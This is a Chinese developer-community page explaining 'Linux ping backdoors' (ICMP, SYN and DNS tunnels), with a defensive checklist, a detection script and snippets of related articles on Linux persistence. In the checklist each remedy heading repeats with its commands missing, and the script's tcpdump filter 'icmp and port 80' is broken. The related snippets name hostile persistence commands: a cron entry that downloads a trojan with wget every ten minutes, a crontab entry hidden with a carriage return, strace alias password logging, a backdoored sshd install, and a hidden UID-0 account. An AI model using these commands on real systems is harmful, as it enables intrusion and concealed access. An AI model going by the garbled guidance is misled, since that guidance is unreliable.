开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

linux ping 后门

基础概念

"Linux ping 后门"通常指的是一种安全漏洞，攻击者利用Linux系统中的ping命令或相关网络协议，植入恶意代码或服务，以便在未来进行远程控制或数据窃取。这种后门可能隐藏在系统的正常功能中，难以被普通用户或管理员发现。

相关优势

攻击者利用ping后门的主要优势包括：

隐蔽性：后门可以隐藏在正常的ping功能中，不易被发现。
持久性：一旦植入，后门可以在系统中长期存在，即使系统重启也不会消失。
远程访问：攻击者可以通过网络远程触发后门，执行任意命令。

类型与应用场景

类型

ICMP隧道：利用ICMP协议传输数据，绕过防火墙限制。
SYN隧道：通过TCP的SYN包建立隧道，实现隐蔽通信。
DNS隧道：利用DNS查询进行数据传输，适用于严格限制出站流量的环境。

应用场景

内部渗透：攻击者已经获得初步访问权限，进一步植入后门以便长期控制。
绕过防火墙：在高度安全的网络环境中，通过非标准协议绕过防火墙限制。
数据窃取：定期从受感染系统提取敏感信息。

问题原因及解决方法

原因

默认配置漏洞：某些Linux发行版的默认配置可能存在安全漏洞。
未打补丁的系统：长时间未更新的系统容易受到已知漏洞的攻击。
弱权限管理：不当的用户权限设置可能导致攻击者轻易植入后门。

解决方法

更新系统和软件：
更新系统和软件：
检查并关闭不必要的服务：
检查并关闭不必要的服务：
使用防火墙限制ICMP流量：
使用防火墙限制ICMP流量：
定期审计系统日志：
定期审计系统日志：
安装入侵检测系统（IDS）：推荐使用Snort或Suricata等开源IDS工具。
强化用户权限管理：使用sudo和visudo严格限制用户权限。

示例代码

以下是一个简单的脚本，用于检测系统中是否存在可疑的ICMP流量：

#!/bin/bash

# 监听ICMP流量
sudo tcpdump -i eth0 icmp and port 80 > /tmp/icmp_traffic.log &

# 定期检查日志文件
while true; do
    if grep -q "malicious_pattern" /tmp/icmp_traffic.log; then
        echo "Suspicious ICMP traffic detected!"
        # 执行进一步的安全措施，如发送警报或阻断IP
        break
    fi
    sleep 60
done

通过上述方法，可以有效防范和检测Linux系统中的ping后门问题。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

Vim 后门 | Linux 后门系列

环境变量的方式进行配置果然，$VIMRUNTIME 是从 Linux 操作系统的环境变量来的因此永久修改 VIMRUNTIME 不一定会修改 runtimepath ,只有通过Linux...:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高，功能较为复杂，因此可以用来做后门的内容肯定很多，作为一个 vim 用户，我对于 vim 的了解也比较有限...，相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门这类后门比较简单粗暴，直接替换相关文件，暂时未发现 vim 存在自身使用的 .so 共享库文件，因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码在主机B上编辑更新源，取消 deb-src 的注释在主机 B 上下载 vim 源代码（可以指定版本...成功创建了有效的带有后门，且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门成功触发后门 5) 小结几乎每一种后门都可以用这样的方法

7225 1

vim 后门 | Linux 后门系列

$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....

1.4K2 0

sudo 后门｜Linux 后门系列

sudo 经常被用来将普通用户权限提升至 root 权限，代替 root 执行部分程序来管理 Linux 系统，这样避免 root 密码被泄漏这篇文章介绍了三种利用其留后门的方法，其中也涉及一个sudo...有趣的特性，在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介通常的应用场景中，配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名文件 + alias 劫持的方法来隐藏新建文件有时候也没必要新建用户，可以尝试开启那些系统用户试试，或许有惊喜也说不定，但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门，以趣味性为主吧前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序，这个程序用来让可以sudo的用户通过 sudoedit

4671 0

alias后门 | Linux 后门系列

/etc/profile 、 /etc/bashrc 、~/.bashrc、~/.bash_profile 、~/.profile 、~/.bash_logout /etc/profile 【系统级】Linux...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章，发现的同一条后门命令，既然有前辈写了，咱们就分析分析上面后门中，其实 alias...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ，这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用，详细的列表可以通过...，记录明文密码，这局限性太大了，顶多可以作为一个后门辅助。...后门 ?

7.7K3 0

SSH Config 后门｜ Linux 后门系列

Ubuntu server 16.04 默认 /etc/ssh/ssh_config

7.9K4 0

计划任务后门 | Linux 后门系列

Linux 计划任务是一项服务，由 cron 工具来完成，主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...一会儿再说吧（Linux上万物皆文件，肯定是文件啦！）...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这种利用方法巧妙在使用了windows中的 \r（ Linux 中显示为M),导致显示截断，从而隐藏我们真实的计划任务，我们使用crontab -e 可以看到真实的计划任务如下： ?

6.9K5 0

修改后门ctime ｜ Linux 后门系列

0x00 前情提要在 alias 后门｜ Linux 后门系列一文中，我们为了让后门完美一些，修改了后门文件的 atime、mtime，但是 ctime 一直没有办法修改，今天我们来把这一块补齐，...让后门更加完美 atime -> access time，访问时间 mtime -> modify time，修改时间 ctime -> change time, 状态变化时间最新版 Linux 中多了一个属性...所以可以查看 stat 的源代码，看一下 stat 应用是如何获取和管理 ctime 的，针对其调用的方法进行系统性地修改应该也是可以实现修改文件 ctime 的 0x03 系统时钟与硬件时钟 Linux...时间系统分为系统时钟和硬件时钟，系统时钟存在于Linux 内核中，而硬件时钟存在于硬件主板上从两种时钟的命名上可以看出，硬件时钟肯定是要比系统时钟更加持久，毕竟系统时钟系统关机就没了嘛硬件时钟靠着.../etc/update-manager/ 如果是需要执行的后门，现在执行并放置后台，如果像 alias 那种配置文件后门则不需要此章节 /etc/update-manager/release-update

5.8K2 0

LD_PRELOAD 后门 | Linux 后门系列

加固后门正常大家检查是否存在 LD_PRELOAD 后门的时候都是直接 echo $LD_PRELOAD ?...设置后门后是这样的 ? alias 劫持显示这个简单了，把这些字符替换成空就行了 ?...咱们把劫持 unalias 和劫持 alias 放在最后，先把这些命令都劫持一下： env 没有后门时候是这样的 ? 设置了后门之后是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?...劫持成功现在我们来进行验证后门还好用吗 ? 可以看到后门可以使用，那么现在我们来看一下以上各种方法还能否看见我们做的手脚 ? 完美！

7.6K2 0

MOTD 后门引发的思考｜ Linux 后门系列

最近看了苑房弘老师的打靶课程，发现了 MOTD 这个东西，于是研究了一下，发现很适合做后门，早在08年以前就有恶意软件使用了这种方式，今天系统地研究一下 motd，全称Message Of The Day...，是Linux中发送问候消息的功能，一般在我们登录服务器后显示每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的，所以很适合用来做后门实用部分随着关注我们的朋友越来越多...root权限留后门这个目录下的所有文件在任意用户登录后都会执行一遍，所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的以 00-header 文件为例 #!...- Linux 命令搜索引擎 https://wangchujiang.com/linux-command/c/trap.html # Construct a user agent, similar to...是如何使策略配置生效的参考 Linux Source Command with Examples https://linuxhint.com/linux-source-command-examples

7.9K0 0

linux禁止ping以及开启ping的方法

Linux默认是允许Ping响应的，系统是否允许Ping由2个因素决定的：A、内核参数，B、防火墙，需要2个因素同时允许才能允许Ping，2个因素有任意一个禁Ping就无法Ping。...B、防火墙（注：此处的方法的前提是内核配置是默认值，也就是没有禁止Ping）这里以Iptables防火墙为例，其他防火墙操作方法可参考防火墙的官方文档。...允许PING设置 iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A OUTPUT -p icmp --icmp-type...service iptables stop 禁止PING设置 [root@centos7 ~]# iptables -A INPUT -p icmp --icmp-type 8 -s 0/0 -j DROP

11.7K2 0

Linux之ping命令

ping命令是iputils（或iputils-ping）程序包的一部分，该程序包已预先安装在绝大多数Linux发行版上。ping命令也可用于Windows，MacOSX和FreeBSD。...ping的通的情况 > ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=...ping不通的情况 > ping 8.8.9.9 PING 8.8.9.9 (8.8.9.9): 56 data bytes Request timeout for icmp_seq 0 Request...ping -4 DESTINATION ping -6 DESTINATION 强制ping使用IPv4传递-4选项或使用其别名ping4。对于IPv6传递-6选项或使用ping6。...原文链接:https://rumenz.com/rumenbiji/linux-ping.html

13.7K2 0

Linux安装后门程序

ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...：将sshdb.tgz后门程序放置到你自己的服务器的某目录下，并且改成为test.tgz，这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码： vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装： # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门

2.3K11 0

权限维持-Linux后门

d在我们攻防当中，常常会碰到linux机器，拿到之后为了避免发现低权限升高权限创建一个c文件 #include int main() { setuid(0);

1.1K1 0

linux ping监控报警

$host_1 echo "-------->开始检测$host服务器通迅是否正常,ping次数$count" ping_result=`ping $host -w 2 -c $ping_count...| gawk '{print $4}'` #取失败百分比 loss_ping=`echo $ping_result | gawk '{print $6}'` if [ $succ_ping...%M:%S"`--->$host服务器ping检测正常" >>ping_log else echo "本次检测结果---->$host服务器有丢包现象,丢包率为:$loss_ping...done mail -s "服务器ping报警" 277215243@qq.com ping_err_log cat /dev/null > /root/ping_err_log echo...>>ping_log #}

7.7K3 0

Linux 之 ping 命令

ping命令是iputils（或iputils-ping）程序包的一部分，该程序包已预先安装在绝大多数Linux发行版上。ping命令也可用于Windows，MacOSX和FreeBSD。...命令格式 ping [参数] [主机名或IP地址] 命令功能 ping命令用于：确定网络和各外部主机的状态；跟踪和隔离硬件和软件问题；测试、评估和管理网络。...ping的通的情况 > ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=...ping -4 DESTINATION ping -6 DESTINATION 强制ping使用IPv4传递-4选项或使用其别名ping4。对于IPv6传递-6选项或使用ping6。...原文链接:https://rumenz.com/rumenbiji/linux-ping.html 微信公众号:入门小站

10.4K0 0

Linux之ping命令

【Linux常用命令速查手册】关注【入门小站】，后台回复「1001」自取。 ping命令是用于排除故障，测试和诊断网络连接问题的最常用的命令之一。...ping命令是iputils（或iputils-ping）程序包的一部分，该程序包已预先安装在绝大多数Linux发行版上。ping命令也可用于Windows，MacOSX和FreeBSD。...ping的通的情况 > ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8): 56 data bytes 64 bytes from 8.8.8.8: icmp_seq=0 ttl=...ping -4 DESTINATION ping -6 DESTINATION 强制ping使用IPv4传递-4选项或使用其别名ping4。对于IPv6传递-6选项或使用ping6。...原文链接:https://rumenz.com/rumenbiji/linux-ping.html

9.5K2 0

mknod | Linux 后门系列

perl 和 Python 在做反弹shell基本差不多，Python 那一节有点讲的太多了，大家可以对比一下参数，照着Python的思路移到 perl 上，我...

1.1K1 0

Linux后门整理合集

UnixBash 远控后门简介利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能，保持反弹上线到公网机器。...nc -vv -lp 53 Linux/Unix 藏文件和文件夹 Linux/Unix 下想藏 Webshell 或者后门什么的，可以利用一下隐藏文件夹和文件。方法一比如创建一个名字开头带 ....利用方法 useradd -o -u 0 backdoor Linux/Unix 修改文件时间戳简介 Unix 下藏后门必须要修改时间，否则很容易被发现，直接利用touch就可以了。...系统环境: dawg:~# uname -a Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux SUID shell...PAM最初是集成在Solaris中，目前已移植到其它系统中，如Linux、SunOS、HP-UX9.0等。搭建PAM后门主要思路：pam_unix_auth.c打补丁安装到正常的PAM模块中。

2K8 0

Linux网络-PING&TELNET

Linux服务器作为一个常用的网络服务器，主要的作用就是向客户端提供网络服务，所以我们需要熟练掌握网络相关的命令，用于探测对端网络是否畅通，用于检查本地网络进程是否正常，以及可以通过命令去远端服务器进行下载文件...主要从以下几个方面来介绍： 1.给Linux服务器配置IP 2.探测对方网络连通性(ping & telnet) 3.下载对方文件（wget） 4.请求对方服务器（curl） 5.检查本地服务状态（netstat...ping命令是网络诊断工具中最基础和常用的命令之一。...ping命令的基本用法如下: ping 常见的 ping 命令选项包括: -c : 指定发送数据包的数量,默认是无限发送(Windowns是发送4个)。...4.判断ping就是判断是否丢包，延时是否不稳定。 5.一般情况下，能ping通，就代表网络的联通性是没问题的，但是也可能出现对方服务器限制了ping的原因。

1051 0

Linux 命令（109）—— ping 命令

注意：Linux 系统下的 ping 命令与 Windows 系统下的 ping 命令稍有不同。...Windows 下运行 ping 命令一般会发出 4 个请求就结束运行该命令；而 Linux 下不会自动终止，此时需要我们按 Ctrl+C 终止或者使用 -c 参数为 ping 命令指定发送的请求数目。...实际上，Linux 内核不使用这个套接字选项 -F FLOW_LABEL 仅 IPv6 有效。为请求包分配一个 20 比特的 flow label。...（4）每隔 0.5 秒 ping 一次，一共 ping 3 次。...【Linux】一步一步学Linux——ping命令(150)

15.7K2 2

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭